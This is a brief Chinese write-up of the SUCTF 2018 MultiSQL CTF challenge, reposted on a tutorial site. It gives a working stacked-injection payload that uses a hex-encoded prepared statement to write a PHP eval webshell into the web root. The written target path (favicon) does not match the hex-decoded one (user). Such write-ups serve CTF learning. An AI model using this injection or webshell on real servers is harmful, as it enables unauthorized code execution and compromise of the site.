[SUCTF 2018]MultiSQL

本文主要是介绍[SUCTF 2018]MultiSQL，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

[SUCTF 2018]MultiSQL

0x01前言

堆叠注入写shell

0x02预编译写shell

需要执行的语句select '<?php @eval($_POST[abc]);?>' into outfile '/var/www/html/favicon/abc.php'

为什么选favicon呢？写题目的时候我也不知道，后来上了shell我才知道，其他目录是没有写权限的

payload=set @a=0x73656C65637420273C3F70687020406576616C28245F504F53545B6162635D293B3F3E2720696E746F206F757466696C6520272F7661722F7777772F68746D6C2F757365722F6162632E70687027;prepare b from @a;execute b;

bp执行记得进行url编码。

flag在根目录

这篇关于[SUCTF 2018]MultiSQL的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！

您可能喜欢

增量更新怎么做？-icode9专业技术文章分享

11-23
压缩包加密方案有哪些？-icode9专业技术文章分享

11-23
用shell怎么写一个开机时自动同步远程仓库的代码？-icode9专业技术文章分享

11-23
webman可以同步自己的仓库吗？-icode9专业技术文章分享

11-23
在 Webman 中怎么判断是否有某命令进程正在运行？-icode9专业技术文章分享

11-23
如何重置new Swiper?-icode9专业技术文章分享

11-23
oss直传有什么好处？-icode9专业技术文章分享

11-23
如何将oss直传封装成一个组件在其他页面调用时都可以使用？-icode9专业技术文章分享

11-23
怎么使用laravel 11在代码里获取路由列表？-icode9专业技术文章分享

11-23
怎么实现ansible playbook 备份代码中命名包含时间戳功能？-icode9专业技术文章分享

11-22
ansible 的archive 参数是什么意思？-icode9专业技术文章分享

11-22
ansible 中怎么只用archive 排除某个目录？-icode9专业技术文章分享

11-22
exclude_path参数是什么作用？-icode9专业技术文章分享

11-22
微信开放平台第三方平台什么时候调用数据预拉取和数据周期性更新接口？-icode9专业技术文章分享

11-22
uniapp 实现聊天消息会话的列表功能怎么实现？-icode9专业技术文章分享

11-22

C/C++教程